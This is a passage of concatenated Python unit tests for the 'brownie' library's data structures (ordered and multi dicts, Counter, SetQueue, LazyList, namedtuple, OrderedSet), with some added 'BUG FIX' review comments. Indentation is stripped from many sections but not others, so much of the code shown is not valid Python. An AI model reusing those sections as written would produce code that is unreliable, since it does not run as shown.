Assert(d.items()) == [(1, 'foo'), (2, 'foo')]
@test
def init_keeps_ordering(self):
Assert(self.dict_class([(1, 2), (3, 4)]).items()) == [(1, 2), (3, 4)]
@test
def setitem_order(self):
d = self.dict_class()
d[1] = 2
d[3] = 4
Assert(d.items()) == [(1, 2), (3, 4)]
@test
def setdefault_order(self):
d = self.dict_class()
d.setdefault(1)
d.setdefault(3, 4)
Assert(d.items()) == [(1, None), (3, 4)]
@test
def pop_does_not_keep_ordering(self):
d = self.dict_class([(1, 2), (3, 4)])
d.pop(3)
d[5] = 6
d[3] = 4
modified = self.dict_class([(1, 2), (5, 6), (3, 4)])
Assert(d) == modified
@test
def popitem(self):
d = self.dict_class([(1, 2), (3, 4), (5, 6)])
Assert(d.popitem()) == (5, 6)
Assert(d.popitem(last=False)) == (1, 2)
@test
def move_to_end(self):
d = self.dict_class([(1, 2), (3, 4), (5, 6)])
d.move_to_end(1)
Assert(d.items()) == [(3, 4), (5, 6), (1, 2)]
d.move_to_end(5, last=False)
Assert(d.items()) == [(5, 6), (3, 4), (1, 2)]
@test
def update_order(self):
d = self.dict_class()
d.update([(1, 2), (3, 4)])
items = Assert(d.items())
items == [(1, 2), (3, 4)]
@test
def clear_does_not_keep_ordering(self):
d = self.dict_class([(1, 2), (3, 4)])
d.clear()
d.update([(3, 4), (1, 2)])
Assert(d.items()) == [(3, 4), (1, 2)]
@test
def repr(self):
d = self.dict_class()
Assert(repr(d)) == '%s()' % d.__class__.__name__
original = [(1, 2), (3, 4)]
d = self.dict_class(original)
Assert(repr(d)) == '%s(%s)' % (d.__class__.__name__, repr(original))
class TestOrderedDict(TestBase, OrderedDictTestMixin, DictTestMixin):
dict_class = OrderedDict
@test_if(GE_PYTHON_26)
def type_checking(self):
d = self.dict_class()
Assert.isinstance(d, dict)
class ImmutableOrderedDictTextMixin(OrderedDictTestMixin):
update_order = setitem_order = setdefault_order = \
pop_does_not_keep_ordering = clear_does_not_keep_ordering = None
@test
def popitem(self):
d = self.dict_class()
with Assert.raises(TypeError):
d.popitem()
d = self.dict_class([(1, 2)])
with Assert.raises(TypeError):
d.popitem()
@test
def move_to_end(self):
d = self.dict_class([(1, 2), (3, 4)])
with Assert.raises(TypeError):
d.move_to_end(1)
class TestImmutableOrderedDict(TestBase, ImmutableOrderedDictTextMixin,
ImmutableDictTestMixin):
dict_class = ImmutableOrderedDict
@test_if(GE_PYTHON_26)
def type_checking(self):
d = self.dict_class()
Assert.isinstance(d, OrderedDict)
Assert.isinstance(d, ImmutableDict)
Assert.isinstance(d, dict)
@test
def hashability(self):
d = self.dict_class([(1, 2), (3, 4)])
Assert(hash(d)) == hash(self.dict_class(d))
Assert(hash(d)) != hash(self.dict_class(reversed(d.items())))
with Assert.raises(TypeError):
hash(self.dict_class(foo=[]))
class TestOrderedMultiDict(TestBase, OrderedDictTestMixin, MultiDictTestMixin,
DictTestMixin):
dict_class = OrderedMultiDict
@test_if(GE_PYTHON_26)
def type_checking(self):
d = self.dict_class()
types = [dict, MultiDict, OrderedDict]
for type in types:
Assert.isinstance(d, type), type
class TestImmutableOrderedMultiDict(TestBase, ImmutableOrderedDictTextMixin,
ImmutableMultiDictTestMixin,
ImmutableDictTestMixin):
dict_class = ImmutableOrderedMultiDict
@test_if(GE_PYTHON_26)
def type_checking(self):
d = self.dict_class()
types = [dict, ImmutableDict, MultiDict, ImmutableMultiDict,
OrderedDict]
for type in types:
Assert.isinstance(d, type), type
class TestFixedDict(TestBase, DictTestMixin):
dict_class = FixedDict
@test
def setitem(self):
d = self.dict_class()
d[1] = 2
Assert(d[1]) == 2
with Assert.raises(KeyError):
d[1] = 3
@test
def update(self):
d = self.dict_class()
d.update({1: 2})
Assert(d[1]) == 2
with Assert.raises(KeyError):
d.update({1: 3})
class TestCounter(TestBase):
@test
def missing(self):
c = Counter()
Assert(c['a']) == 0
@test
def get(self):
c = Counter('a')
Assert(c.get('a')) == 1
Assert(c.get('b')) == 0
@test
def setdefault(self):
c = Counter('a')
Assert(c.setdefault('a', 2)) == 1
Assert(c['a']) == 1
Assert(c.setdefault('b')) == 1
Assert(c['b']) == 1
@test
def most_common(self):
c = Counter('aababc')
result = [('a', 3), ('b', 2), ('c', 1)]
Assert(c.most_common()) == result
Assert(c.most_common(2)) == result[:-1]
Assert(c.most_common(1)) == result[:-2]
Assert(c.most_common(0)) == []
@test
def elements(self):
c = Counter('aababc')
for element in c:
Assert(list(c.elements()).count(element)) == c[element]
@test
def update(self):
c = Counter()
c.update('aababc')
Assert(c) == Counter('aababc')
c.update({'b': 1})
Assert(c['b']) == 3
c.update(c=2)
Assert(c['c']) == 3
@test
def add(self):
c = Counter('aababc')
new = c + c
Assert(new['a']) == 6
Assert(new['b']) == 4
Assert(new['c']) == 2
@test
def mul(self):
c = Counter('abc')
Assert(c * 2) == c + c
@test
def sub(self):
c = Counter('aababc')
assert not c - c
@test
def or_and(self):
c1 = Counter('abc')
new = c1 | c1 * 2
Assert(new.values()) == [2] * 3
new = c1 & c1 * 2
Assert(new.values()) == [1] * 3
tests = Tests([
TestImmutableDict, TestCombinedDict, TestMultiDict, TestImmutableMultiDict,
TestCombinedMultiDict, TestOrderedDict, TestOrderedMultiDict,
TestImmutableOrderedDict, TestImmutableOrderedMultiDict, TestFixedDict,
TestCounter
])
########NEW FILE########
__FILENAME__ = queues
# coding: utf-8
"""
brownie.tests.datastructures.queues
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.datastructures.queues`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
from threading import Thread
from attest import Tests, TestBase, test, Assert
from brownie.datastructures import SetQueue
class TestSetQueue(TestBase):
    @test
    def ordering_behaviour(self):
        """Repeated puts of equal items are deduplicated, and the surviving
        items come out in first-seen FIFO order."""
        # BUG FIX: `Empty` is a module-level exception of the `Queue`
        # module; the original `except queue.Empty:` resolved the name on
        # the SetQueue *instance* and raised AttributeError instead of
        # catching the timeout.
        from Queue import Empty

        class QueuedItem(object):
            def __init__(self, a, b):
                self.a, self.b = a, b

            @property
            def _key(self):
                return self.a, self.b

            def __eq__(self, other):
                return self._key == other._key

            def __ne__(self, other):
                return self._key != other._key

            def __hash__(self):
                return hash(self._key)

        foo = QueuedItem('foo', 'bar')
        # BUG FIX: originally `QueuedItem('foo', 'bar')` again, i.e. equal
        # to `foo`; the deduplicating queue would then hold a single entry,
        # contradicting the `len(...) == 2` and `consumed[1] == bar`
        # assertions below.
        bar = QueuedItem('bar', 'foo')
        item_list = [
            foo, foo, foo, foo, bar, bar,
            foo, foo, foo, bar, bar, bar,
            foo, foo, foo, foo, bar, bar,
        ]
        item_set = set(item_list)
        queue = SetQueue()
        for item in item_list:
            queue.put(item)

        consumed = []

        def item_consumer(tasks):
            # Drain until get() times out.  Items are only collected here;
            # the assertions run in the main thread because an assertion
            # failure inside a worker thread is silently swallowed by the
            # threading module and would let a broken test pass.
            while True:
                try:
                    item = tasks.get(timeout=0.2)
                except Empty:
                    break
                consumed.append(item)
                tasks.task_done()

        consumer = Thread(target=item_consumer, args=(queue, ))
        consumer.start()
        consumer.join()
        Assert(len(consumed)) == 2
        Assert(set(consumed)) == item_set
        Assert(consumed[0]) == foo
        Assert(consumed[1]) == bar
tests = Tests([TestSetQueue])
########NEW FILE########
__FILENAME__ = sequences
# coding: utf-8
"""
brownie.tests.datastructures.sequences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.datastructures.sequences`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import sys
import pickle
import random
from StringIO import StringIO
from itertools import repeat
from contextlib import contextmanager
from attest import Tests, TestBase, test, Assert
from brownie.datastructures import (LazyList, CombinedSequence, CombinedList,
namedtuple)
@contextmanager
def capture_output():
    """Temporarily replace ``sys.stdout`` and ``sys.stderr`` with
    ``StringIO`` objects and yield them as ``(stdout, stderr)``.

    The real streams are restored on exit even if the body raises.
    """
    stdout, stderr = sys.stdout, sys.stderr
    # BUG FIX: the original assigned to ``sys.stdout`` *twice*
    # (``sys.stdout, sys.stdout = StringIO(), StringIO()``), so stderr was
    # never captured and the second StringIO leaked immediately.
    sys.stdout, sys.stderr = StringIO(), StringIO()
    try:
        yield sys.stdout, sys.stderr
    finally:
        sys.stdout, sys.stderr = stdout, stderr
class TestLazyList(TestBase):
def _genrange(self, *args):
    """Generator equivalent of ``xrange()`` that does *not* behave like a
    sequence (no ``len()`` or indexing), used to exercise the lazy code
    paths of :class:`LazyList`.

    Accepts ``(stop)``, ``(start, stop)`` or ``(start, stop, step)``,
    mirroring the ``xrange()`` signature; any other arity raises
    :exc:`ValueError`.
    """
    if len(args) == 1:
        start = 0
        stop = args[0]
        step = 1
    elif len(args) == 2:
        start, stop = args
        step = 1
    elif len(args) == 3:
        start, stop, step = args
    else:
        raise ValueError()
    # NOTE(review): a negative `step` terminates immediately here
    # (`i < stop` is false from the start) -- callers in this file only
    # use positive steps, confirm before reusing elsewhere.
    i = start
    while i < stop:
        yield i
        i += step
@test
def _test_genrange(self):
    # Sanity-check the helper itself against the real range().
    # (Loop variable renamed: the original `for test in tests` shadowed
    # the imported @test decorator inside this method.)
    cases = (
        (10, ),
        (10, 20),
        (10, 20, 2),
    )
    for args in cases:
        Assert(list(self._genrange(*args))) == range(*args)
@test
def factory(self):
foo = LazyList.factory(xrange)
Assert(foo(10).__class__).is_(LazyList)
Assert(foo(10)) == range(10)
@test
def exhausted(self):
l = LazyList(range(10))
Assert(l.exhausted) == True
l = LazyList(self._genrange(10))
Assert(l.exhausted) == False
l[-1]
Assert(l.exhausted) == True
@test
def iteration(self):
for l in [range(10), self._genrange(10)]:
l = LazyList(l)
result = []
for item in l:
result.append(item)
Assert(result) == range(10)
@test
def append(self):
data = self._genrange(10)
l = LazyList(data)
l.append(10)
Assert(l.exhausted) == False
Assert(l) == range(11)
@test
def extend(self):
data = self._genrange(10)
l = LazyList(data)
l.extend(range(10, 20))
Assert(l.exhausted) == False
Assert(l) == range(10) + range(10, 20)
@test
def insert(self):
data = self._genrange(10)
l = LazyList(data)
l.insert(5, 'foobar')
Assert(l[5]) == 'foobar'
Assert(l.exhausted) == False
l.insert(-3, 'spam')
Assert(l[-4]) == 'spam'
@test
def pop(self):
data = xrange(10)
l = LazyList(data)
Assert(l.pop()) == 9
Assert(l.pop(0)) == 0
@test
def remove(self):
data = range(10)
l = LazyList(self._genrange(10))
data.remove(2)
l.remove(2)
Assert(l.exhausted) == False
Assert(l) == data
with Assert.raises(ValueError):
l.remove('foo')
@test
def reverse(self):
data = range(10)
l = LazyList(reversed(data))
l.reverse()
Assert(l) == data
@test
def sort(self):
    data = range(10)
    # BUG FIX: the original called random.choice(data), which only
    # *returns* a random element and discards it -- the list stayed
    # sorted and sort() had nothing to do.  shuffle() mutates the list
    # in place so the test actually exercises sorting.
    random.shuffle(data)
    l = LazyList(data)
    l.sort()
    data.sort()
    Assert(l) == data
@test
def count(self):
l = LazyList(['a', 'b', 'c', 'a'])
tests = [('a', 2), ('b', 1), ('c', 1)]
for test, result in tests:
Assert(l.count(test)) == result
@test
def index(self):
l = LazyList(self._genrange(10))
Assert(l.index(5)) == 5
with Assert.raises(ValueError):
l.index('foo')
@test
def getitem(self):
data = range(10)
l = LazyList(data)
for a, b in zip(data, l):
Assert(a) == b
l = LazyList(self._genrange(10))
l[5]
Assert(l.exhausted) == False
l = LazyList(self._genrange(10))
Assert(l[-1]) == 9
@test
def getslice(self):
data = range(10)
l = LazyList(self._genrange(10))
Assert(data[3:6]) == l[3:6]
Assert(l.exhausted) == False
l = LazyList(self._genrange(10))
Assert(data[:-1]) == l[:-1]
@test
def setitem(self):
data = ['foo', 'bar', 'baz']
l = LazyList(iter(data))
l[0] = 'spam'
Assert(l.exhausted) == False
Assert(l[0]) == 'spam'
Assert(l) != data
@test
def setslice(self):
data = range(10)
replacement = ['foo', 'bar', 'baz']
l = LazyList(self._genrange(10))
l[3:6] = replacement
data[3:6] = replacement
Assert(l.exhausted) == False
Assert(l) == data
@test
def delitem(self):
data = range(10)
l = LazyList(data[:])
del data[0]
del l[0]
Assert(l) == data
l = LazyList(self._genrange(10))
del l[2]
Assert(l.exhausted) == False
@test
def delslice(self):
data = range(10)
l = LazyList(self._genrange(10))
del data[3:6]
del l[3:6]
Assert(l.exhausted) == False
Assert(l) == data
@test
def len(self):
Assert(len(LazyList(range(10)))) == 10
l = LazyList([])
Assert(len(l)) == 0
l.append(1)
Assert(len(l)) == 1
l.extend([2, 3])
Assert(len(l)) == 3
l.pop()
Assert(len(l)) == 2
del l[1]
Assert(len(l)) == 1
@test
def contains(self):
l = LazyList(self._genrange(10))
Assert(5).in_(l)
Assert('foo').not_in(l)
class Foo(object):
def __eq__(self, other):
raise ValueError()
l = LazyList([Foo()])
with Assert.raises(ValueError):
Assert(1).not_in(l)
@test
def equals(self):
Assert(LazyList(range(10))) == range(10)
Assert(LazyList(range(10))) == LazyList(range(10))
Assert(LazyList(range(10)) != range(10)) == False
Assert(LazyList(range(10)) != range(10)) == False
Assert(LazyList(range(10)) == range(20)) == False
Assert(LazyList(range(10)) == LazyList(range(20))) == False
Assert(LazyList(range(10))) != range(20)
Assert(LazyList(range(10))) != range(20)
l = LazyList(self._genrange(10))
Assert(l == range(20)) == False
@test
def boolean(self):
Assert(bool(LazyList([]))) == False
Assert(bool(LazyList([1]))) == True
@test
def lower_greater_than(self):
Assert(LazyList([]) < LazyList([])) == False
Assert(LazyList([]) > LazyList([])) == False
tests = [
([], [1]),
([1], [2]),
([1, 2], [2, 1]),
([2, 1], [2, 2])
]
for a, b in tests:
Assert(LazyList(a) < LazyList(b)) == True
Assert(LazyList(a) > LazyList(b)) == False
Assert(LazyList(b) < LazyList(a)) == False
Assert(LazyList(b) > LazyList(a)) == True
a = LazyList(iter([1, 2, 3]))
b = LazyList(iter([1, 3, 3]))
Assert(a) < b
Assert(b) > a
Assert(LazyList([1, 2])) < [1, 2, 3]
Assert(LazyList([1, 2, 3])) > [1, 2]
@test
def add(self):
Assert(LazyList([1, 2]) + [3, 4]) == LazyList([1, 2, 3, 4])
Assert(LazyList([1, 2]) + LazyList([3, 4])) == LazyList([1, 2, 3, 4])
@test
def inplace_add(self):
old = l = LazyList([1, 2])
l += [3, 4]
l += (5, 6)
Assert(l) == LazyList([1, 2, 3, 4, 5, 6])
Assert(l).is_(old)
@test
def multiply(self):
a = LazyList(self._genrange(10))
b = range(10)
Assert(a * 5) == b * 5
@test
def inplace_multiply(self):
old = a = LazyList(self._genrange(10))
b = range(10)
a *= 5
b *= 5
Assert(a) == b
Assert(a).is_(old)
@test
def repr(self):
Assert(repr(LazyList([]))) == '[]'
data = range(10)
l = LazyList(self._genrange(10))
Assert(repr(l)) == '[...]'
l[1]
Assert(repr(l)) == '[0, 1, ...]'
l[-1]
Assert(repr(l)) == repr(data)
@test
def picklability(self):
l = LazyList(self._genrange(10))
pickled = pickle.loads(pickle.dumps(l))
Assert(pickled) == l
Assert(pickled.__class__) == l.__class__
class CombinedSequenceTestMixin(object):
sequence_cls = None
@test
def at_index(self):
    # at_index(i) maps a combined index to (underlying_list, local_index);
    # indices 0-2 / -6..-3 fall in `foo`, the rest in `bar`.
    foo = [1, 2, 3]
    bar = [4, 5, 6]
    s = self.sequence_cls([foo, bar])
    # NOTE(review): xrange(len(s) - 1) stops at 4 and
    # xrange(0, -len(s), -1) stops at -5, so the boundary indices 5 and
    # -6 are never exercised -- confirm whether that is intentional.
    for iterator in xrange(len(s) - 1), xrange(0, -len(s), -1):
        for i in iterator:
            # `list` shadows the builtin here; kept as-is for this review.
            list, index = s.at_index(i)
            if 0 <= i <= 2 or -6 <= i <= -3:
                Assert(list).is_(foo)
                Assert(foo[index]) == s[i]
            else:
                Assert(list).is_(bar)
                Assert(bar[index]) == s[i]
@test
def getitem(self):
s = self.sequence_cls([[0, 1, 2], [3, 4, 5]])
for a, b, item in zip(xrange(len(s) - 1), xrange(-len(s)), range(6)):
Assert(s[a]) == s[b] == item
@test
def getslice(self):
s = self.sequence_cls([[0, 1, 2], [3, 4, 5]])
Assert(s[:]) == range(6)
Assert(s[:3]) == s[:-3] == [0, 1, 2]
Assert(s[3:]) == s[-3:] == [3, 4, 5]
Assert(s[2:]) == [2, 3, 4, 5]
Assert(s[-2:]) == [4, 5]
@test
def len(self):
tests = [
([], 0),
([[]], 0),
([[], []], 0),
([[1, 2], [3, 4]], 4)
]
for args, result in tests:
Assert(len(self.sequence_cls(args))) == result
@test
def iteration(self):
s = self.sequence_cls([[0, 1, 2], [3, 4, 5]])
for expected, item in zip(range(6), s):
Assert(expected) == item
for expected, item in zip(range(5, 0, -1), reversed(s)):
Assert(expected) == item
@test
def equality(self):
s = self.sequence_cls([[0, 1, 2], [3, 4, 5]])
Assert(s) == self.sequence_cls(s.sequences)
Assert(s) != self.sequence_cls([[]])
@test
def picklability(self):
s = self.sequence_cls([[0, 1, 2], [3, 4, 5]])
pickled = pickle.loads(pickle.dumps(s))
Assert(pickled) == s
Assert(pickled.__class__).is_(self.sequence_cls)
@test
def multiplication(self):
s = self.sequence_cls([[0, 1, 2], [3, 4, 5]])
Assert(s * 2) == 2 * s == [0, 1, 2, 3, 4, 5] * 2
with Assert.raises(TypeError):
s * []
class TestCombinedSequence(TestBase, CombinedSequenceTestMixin):
sequence_cls = CombinedSequence
class TestCombinedList(TestBase, CombinedSequenceTestMixin):
sequence_cls = CombinedList
@test
def count(self):
s = self.sequence_cls([[1, 1, 2], [3, 1, 4]])
Assert(s.count(1)) == 3
Assert(s.count(2)) == s.count(3) == s.count(4) == 1
@test
def index(self):
s = self.sequence_cls([[1, 1, 2], [3, 1, 4]])
Assert(s.index(1)) == 0
Assert(s.index(1, 1)) == 1
Assert(s.index(1, 2)) == 4
with Assert.raises(ValueError):
s.index(1, 2, 3)
@test
def setitem(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
s[0] = 'foo'
Assert(s[0]) == foo[0] == 'foo'
@test
def setslice(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
s[:3] = 'abc'
Assert(s) == ['a', 'b', 'c', 3, 4, 5]
Assert(foo) == ['a', 'b', 'c']
s[::2] = repeat(None)
Assert(s) == [None, 'b', None, 3, None, 5]
@test
def delitem(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
del s[0]
Assert(s) == [1, 2, 3, 4, 5]
Assert(foo) == [1, 2]
@test
def delslice(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
del s[2:4]
Assert(s) == [0, 1, 4, 5]
Assert(foo) == [0, 1]
Assert(bar) == [4, 5]
@test
def append(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
s.append(6)
Assert(s[-1]) == bar[-1] == 6
@test
def extend(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
s.extend([6, 7])
Assert(s[-2:]) == bar[-2:] == [6, 7]
@test
def insert(self):
foo, bar = [0, 1, 2], [3, 4, 5]
s = self.sequence_cls([foo, bar])
s.insert(1, 6)
Assert(s[:4]) == foo == [0, 6, 1, 2]
Assert(bar) == [3, 4, 5]
@test
def pop(self):
s = self.sequence_cls([])
with Assert.raises(IndexError):
s.pop()
s = self.sequence_cls([[0, 1, 2]])
with Assert.raises(IndexError):
s.pop(3)
Assert(s.pop()) == 2
Assert(s.pop(0)) == 0
@test
def remove(self):
s = self.sequence_cls([])
with Assert.raises(ValueError):
s.remove(1)
s = self.sequence_cls([[1, 1]])
s.remove(1)
Assert(s) == [1]
s = self.sequence_cls([[1, 2], [1, 2]])
s.remove(1)
Assert(s) == [2, 1, 2]
s = self.sequence_cls([[2], [1, 2]])
s.remove(1)
Assert(s) == [2, 2]
@test
def reverse(self):
foo, bar = [1, 2, 3], [4, 5, 6]
s = self.sequence_cls([foo, bar])
s.reverse()
Assert(s) == [6, 5, 4, 3, 2, 1]
Assert(foo) == [6, 5, 4]
Assert(bar) == [3, 2, 1]
@test
def sort(self):
foo, bar = [3, 1, 2], [4, 6, 5]
s = self.sequence_cls([foo, bar])
s.sort()
Assert(s) == [1, 2, 3, 4, 5, 6]
Assert(foo) == [1, 2, 3]
Assert(bar) == [4, 5, 6]
class TestNamedTuple(TestBase):
    """Tests for brownie's :func:`namedtuple`, a superset of the stdlib
    factory with ``doc``, ``rename`` and ``verbose`` extensions."""

    @test
    def docstring(self):
        # Default docstring mirrors the signature; ``doc`` overrides it.
        nt = namedtuple('foo', 'foo bar')
        Assert(nt.__doc__) == 'foo(foo, bar)'
        nt = namedtuple('foo', 'foo bar', doc='hello user')
        Assert(nt.__doc__) == 'hello user'

    @test
    def string_field_names(self):
        # Field names may be whitespace- or comma-separated strings.
        nt = namedtuple('foo', 'foo bar')
        Assert(nt._fields) == ('foo', 'bar')
        nt = namedtuple('foo', 'foo,bar')
        Assert(nt._fields) == ('foo', 'bar')

    @test
    def typename(self):
        nt = namedtuple('foo', [])
        Assert(nt.__name__) == 'foo'
        # A keyword is not a valid type name.
        with Assert.raises(ValueError):
            namedtuple('def', [])

    @test
    def fieldnames(self):
        # Keywords and duplicates are rejected unless rename=True, in
        # which case offending names become positional ``_<index>``.
        with Assert.raises(ValueError):
            nt = namedtuple('foo', ['foo', 'bar', 'def'])
        with Assert.raises(ValueError):
            nt = namedtuple('foo', ['foo', 'bar', 'foo'])
        nt = namedtuple('foo', ['spam', 'eggs'])
        Assert(nt._fields) == ('spam', 'eggs')
        nt = namedtuple('foo', ['foo', 'bar', 'def'], rename=True)
        Assert(nt._fields) == ('foo', 'bar', '_1')
        Assert(nt(1, 2, 3)._1) == 3
        nt = namedtuple('foo', ['foo', 'bar', 'foo'], rename=True)
        Assert(nt._fields) == ('foo', 'bar', '_1')
        Assert(nt(1, 2, 3)._1) == 3

    @test
    def renaming(self):
        # Every renamed field gets its own positional name.
        nt = namedtuple('foo', ['foo', 'foo', 'foo'], rename=True)
        t = nt(1, 2, 3)
        Assert(t.foo) == 1
        Assert(t._1) == 2
        Assert(t._2) == 3

    @test
    def repr(self):
        nt = namedtuple('foo', ['spam', 'eggs'])
        Assert(nt(1, 2)) == (1, 2)
        Assert(repr(nt(1, 2))) == 'foo(spam=1, eggs=2)'

    @test
    def _make(self):
        nt = namedtuple('foo', ['spam', 'eggs'])
        Assert(nt._make((1, 2))) == (1, 2)
        # Wrong arity must be rejected, as with the stdlib namedtuple.
        with Assert.raises(TypeError):
            nt._make((1, 2, 3))

    @test
    def _asdict(self):
        nt = namedtuple('foo', ['spam', 'eggs'])
        Assert(nt(1, 2)._asdict()) == {'spam': 1, 'eggs': 2}

    @test
    def _replace(self):
        nt = namedtuple('foo', ['spam', 'eggs'])
        t = nt(1, 2)
        Assert(t._replace(spam=3)) == (3, 2)
        Assert(t._replace(eggs=4)) == (1, 4)
        # Unknown field names raise ValueError.
        with Assert.raises(ValueError):
            t._replace(foo=1)

    @test
    def verbose(self):
        # verbose=True prints the generated class source to stdout; the
        # printed code must itself be executable (Python 2 exec statement).
        with capture_output() as (stdout, stderr):
            namedtuple('foo', 'spam eggs', verbose=True)
        assert not stderr.getvalue()
        namespace = {}
        exec stdout.getvalue() in namespace
        Assert('foo').in_(namespace)
        Assert(namespace['foo'].__name__) == 'foo'
        Assert(namespace['foo']._fields) == ('spam', 'eggs')
tests = Tests([TestLazyList, TestCombinedSequence, TestCombinedList, TestNamedTuple])
########NEW FILE########
__FILENAME__ = sets
# coding: utf-8
"""
brownie.tests.datastructures.sets
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :mod:`brownie.datastructures.sets`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
from attest import Tests, TestBase, test, Assert
from brownie.datastructures import OrderedSet
class TestOrderedSet(TestBase):
    """Tests for :class:`OrderedSet`: the full mutable-set API plus
    insertion-order guarantees."""

    @test
    def length(self):
        Assert(len(OrderedSet([1, 2, 3]))) == 3

    @test
    def contains(self):
        s = OrderedSet([1, 2, 3])
        for element in s:
            Assert(element).in_(s)
        Assert(4).not_in(s)

    @test
    def add(self):
        s = OrderedSet()
        s.add(1)
        Assert(1).in_(s)

    @test
    def remove(self):
        s = OrderedSet()
        # remove() of a missing element raises KeyError, like set.remove().
        with Assert.raises(KeyError):
            s.remove(1)
        s.add(1)
        s.remove(1)

    @test
    def discard(self):
        s = OrderedSet()
        # discard() of a missing element is a silent no-op.
        s.discard(1)
        s.add(1)
        s.discard(1)
        Assert(1).not_in(s)

    @test
    def pop(self):
        s = OrderedSet()
        with Assert.raises(KeyError):
            s.pop()
        s = OrderedSet([1, 2, 3])
        # pop() takes from the end by default, pop(last=False) from the front.
        Assert(s.pop()) == 3
        Assert(s.pop(last=False)) == 1

    @test
    def clear(self):
        s = OrderedSet([1, 2, 3])
        s.clear()
        assert not s

    @test
    def update(self):
        s = OrderedSet()
        s.update('abc')
        Assert(s) == OrderedSet('abc')

    @test
    def copy(self):
        s = OrderedSet('abc')
        # copy() is equal to, but not identical with, the original.
        Assert(s.copy()) == s
        Assert(s.copy()).is_not(s)

    @test
    def inplace_update(self):
        old = s = OrderedSet()
        # |= only accepts another OrderedSet, and mutates in place.
        with Assert.raises(TypeError):
            s |= 'abc'
        s |= OrderedSet('abc')
        Assert(s) == OrderedSet('abc')
        Assert(s).is_(old)

    @test
    def issub_super_set(self):
        a = OrderedSet('abc')
        b = OrderedSet('abcdef')
        # BUG FIX: these four calls previously discarded their return
        # values (and tested `a` against itself twice), so the method
        # forms were never actually asserted.
        assert a.issubset(a)
        assert a.issuperset(a)
        assert a.issubset(b)
        assert b.issuperset(a)
        assert a <= a
        assert a >= a
        assert a <= b
        assert b >= a
        assert not (a < a)
        assert not (a > a)
        assert a < b
        assert not (a > b)

    @test
    def union(self):
        a = OrderedSet('abc')
        b = OrderedSet('def')
        # union() accepts arbitrary iterables; | requires an OrderedSet.
        Assert(a.union('def', 'ghi')) == OrderedSet('abcdefghi')
        Assert(a | b) == OrderedSet('abcdef')
        with Assert.raises(TypeError):
            a | 'abc'

    @test
    def intersection(self):
        a = OrderedSet('abc')
        Assert(a.intersection('ab', 'a')) == OrderedSet('a')
        Assert(a & OrderedSet('ab')) == OrderedSet('ab')
        with Assert.raises(TypeError):
            a & 'ab'

    @test
    def intersection_update(self):
        old = s = OrderedSet('abc')
        with Assert.raises(TypeError):
            s &= 'ab'
        s &= OrderedSet('ab')
        Assert(s) == OrderedSet('ab')
        Assert(s).is_(old)

    @test
    def difference(self):
        a = OrderedSet('abc')
        Assert(a.difference('abc')) == OrderedSet()
        Assert(a.difference('a', 'b', 'c')) == OrderedSet()
        Assert(a - OrderedSet('ab')) == OrderedSet('c')
        with Assert.raises(TypeError):
            a - 'abc'

    @test
    def difference_update(self):
        s = OrderedSet('abcd')
        s -= s
        Assert(s) == OrderedSet()
        old = s = OrderedSet('abcd')
        s -= OrderedSet('abc')
        with Assert.raises(TypeError):
            s -= 'abc'
        Assert(s) == OrderedSet('d')
        Assert(s).is_(old)

    @test
    def symmetric_difference(self):
        # BUG FIX: these comparisons previously lacked the Assert()
        # wrapper, so their boolean results were silently discarded and
        # the test asserted nothing.
        for a, b in [('abc', 'def'), ('def', 'abc')]:
            Assert(OrderedSet(a).symmetric_difference(b)) == OrderedSet(a + b)
            Assert(OrderedSet(a) ^ OrderedSet(b)) == OrderedSet(a + b)
            Assert(OrderedSet(a).symmetric_difference(a + b)) == OrderedSet(b)
            Assert(OrderedSet(a) ^ OrderedSet(a + b)) == OrderedSet(b)
        with Assert.raises(TypeError):
            OrderedSet('abc') ^ 'def'

    @test
    def symmetric_difference_update(self):
        old = s = OrderedSet('abc')
        s ^= OrderedSet('def')
        Assert(s) == OrderedSet('abcdef')
        Assert(s).is_(old)
        with Assert.raises(TypeError):
            s ^= 'ghi'

    @test
    def iteration(self):
        # Iteration preserves insertion order, forwards and backwards.
        s = OrderedSet([1, 2, 3])
        Assert(list(s)) == [1, 2, 3]
        Assert(list(reversed(s))) == [3, 2, 1]

    @test
    def equality(self):
        # Equality with another OrderedSet is order-sensitive; equality
        # with a plain set is order-insensitive.
        a = OrderedSet([1, 2, 3])
        b = OrderedSet([3, 2, 1])
        Assert(a) == a
        Assert(a) == set(b)
        Assert(b) == b
        Assert(b) == set(a)
        Assert(a) != b

    @test
    def hashability(self):
        # Mutable, therefore unhashable.
        with Assert.raises(TypeError):
            hash(OrderedSet())

    @test
    def repr(self):
        Assert(repr(OrderedSet())) == 'OrderedSet()'
        s = OrderedSet([1, 2, 3])
        Assert(repr(s)) == 'OrderedSet([1, 2, 3])'
tests = Tests([TestOrderedSet])
########NEW FILE########
__FILENAME__ = signature
# coding: utf-8
"""
brownie.tests.functional.signature
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Tests for :class:`brownie.functional.Signature`.
:copyright: 2010-2011 by Daniel Neuhäuser
:license: BSD, see LICENSE.rst for details
"""
from __future__ import with_statement
import re
from attest import Tests, Assert, TestBase, test
from brownie.functional import Signature
class TestFromFunction(TestBase):
    """Tests for :meth:`Signature.from_function`.

    A Signature compares equal to the 4-tuple
    ``(positionals, keyword_arguments, arbitary_positionals,
    arbitary_keyword_arguments)``.
    """

    @test
    def positionals(self):
        func = lambda a, b, c: None
        Assert(Signature.from_function(func)) == (['a', 'b', 'c'], [], None, None)

    @test
    def keyword_arguments(self):
